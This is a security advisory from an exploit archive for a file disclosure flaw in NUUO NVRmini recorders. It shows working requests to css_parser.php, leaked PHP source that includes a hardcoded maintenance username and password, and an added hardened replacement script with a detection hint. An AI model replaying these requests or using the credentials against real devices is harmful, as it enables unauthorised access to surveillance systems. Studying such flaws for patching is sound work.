ID: 1337DAY-ID-25218
Type: zdt
Reporter: LiquidWorm
Modified: 2016-08-06T00:00:00
Description: Exploit for php platform in category web applications
NUUO Local File Disclosure Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes fully equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffer from a file disclosure
vulnerability: input passed through the 'css' parameter of the 'css_parser.php' script
is not properly verified before being used to read and return files. The script only
rejects '..' sequences, so any file under the web root, PHP source included, is read
with file_get_contents() and returned as text/css. This can be exploited to disclose
the contents of files from local resources.
Tested on: GNU/Linux 3.0.8 (armv7l)
           GNU/Linux 2.6.31.8 (armv5tel)
           lighttpd/1.4.28
           PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                           @zeroscience
Advisory ID: ZSL-2016-5350
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php
14.01.2016
--
Request:
--------
GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1
Response:
---------
<?php
include('utils.php');
header("Expires: Thu, 19 Nov 1981 08:52:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");
session_start();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>DatTool</title>
</head>
<body>
<?php
if (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))
{
if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')
{
exit(0);
}
if (isset($_POST['act']) && $_POST['act'] == 'checkdat')
{
echo '<script language="javascript">';
echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")';
echo '</script>';
touch(constant("FLASH_FOLDER")."/checkdat");
}
?>
<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
<input type="hidden" name="username" value="<?php echo $_POST['username']; ?>">
<input type="hidden" name="password" value="<?php echo htmlspecialchars( $_POST['password'] ); ?>">
<input type="hidden" name="act" value="checkdat">
<input type="submit" value="Repair" name="submit" >
</form>
<?php
}
else
{
?>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
Usermame: <input type="text" size="15" name="username" value=""><br />
Password: <input type="password" size="15" name="password" value=""><br />
<input type="submit" value="Submit" name="submit" >
</form>
<?php
}
?>
</body>
</html>
============================================================================
Request:
--------
GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1
Response:
---------
<?php
if(!isset($_GET['css']))exit('/* please supply a "css" parameter */');
$filename=$_GET['css'];
if(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');
$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;
if(!file_exists($filename))exit('/* referred css file does not exist */');
header('content-type:text/css');
header("Expires: ".gmdate("D, d M Y H:i:s", (time()+900)) . " GMT");
$matches=array();
$names=array();
$values=array();
$file=file_get_contents($filename);
foreach ($_GET as $key=>$value)
{
//echo "Key: $key; Value: $value <br/>\n ";
if ($key != 'css')
{
$file = str_replace($key,$value,$file);
}
//system("echo \"Key: $key; Value: $value <br/>\n \" >> $filename");
}
echo $file;
/*
foreach(array_reverse($matches[0]) as $match){
$match=preg_replace('/\s+/',' ',rtrim(ltrim($match)));
$names[]=preg_replace('/\s.*//*','',$match);
$values[]=preg_replace('/^[^\s]*\s/','',$match);
}
*/
?>
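A hardened replacement for css_parser.php, added here as an example; it is not NUUO's own code. It assumes stylesheets live under DOCUMENT_ROOT/css (a hypothetical layout) and serves only .css files whose resolved path stays inside that directory; the per-parameter str_replace() rewriting from the original script is dropped.

```php
<?php
// Hardened css_parser.php (example code, not NUUO's). Assumptions: all
// stylesheets live under DOCUMENT_ROOT/css and nothing but *.css files
// should ever be served by this endpoint.

/**
 * Resolve a requested stylesheet name to an absolute path inside the
 * stylesheet directory, or return null if the request must be refused.
 *
 * @param string $documentRoot  value of $_SERVER['DOCUMENT_ROOT']
 * @param mixed  $requested     raw value of the 'css' query parameter
 * @return string|null
 */
function resolve_css_path($documentRoot, $requested)
{
    // Accept only a simple relative name built from safe characters and
    // ending in .css. This rejects '..', NUL bytes, absolute paths and
    // any attempt to name a .php file in the first place.
    if (!is_string($requested) ||
        !preg_match('#^[A-Za-z0-9_/-]+\.css$#', $requested)) {
        return null;
    }

    $base = realpath($documentRoot . '/css');
    if ($base === false) {
        return null;
    }

    // realpath() collapses symlinks and any remaining '..' segments, so the
    // prefix test below checks the file the OS will actually open.
    $target = realpath($base . '/' . $requested);
    if ($target === false ||
        strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }

    // Re-check the resolved name: a symlink named foo.css that points at a
    // .php file would otherwise pass the regex above.
    if (!is_file($target) || substr($target, -4) !== '.css') {
        return null;
    }

    return $target;
}

if (!isset($_GET['css'])) {
    http_response_code(400);
    exit('/* please supply a "css" parameter */');
}

$path = resolve_css_path($_SERVER['DOCUMENT_ROOT'], $_GET['css']);
if ($path === null) {
    // One generic answer for every rejected request, so the response does
    // not reveal whether a file outside the css directory exists.
    http_response_code(404);
    exit('/* referred css file does not exist */');
}

header('Content-Type: text/css');
header('Expires: ' . gmdate('D, d M Y H:i:s', time() + 900) . ' GMT');

// The original script substituted every other query parameter into the
// file with str_replace(), which lets a client rewrite the stylesheet it
// receives. Serve the file verbatim instead.
readfile($path);
```

On the web server side, requests to css_parser.php whose css value does not end in .css are a useful detection signal for attempts against unpatched devices.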
# 0day.today [2018-01-02] #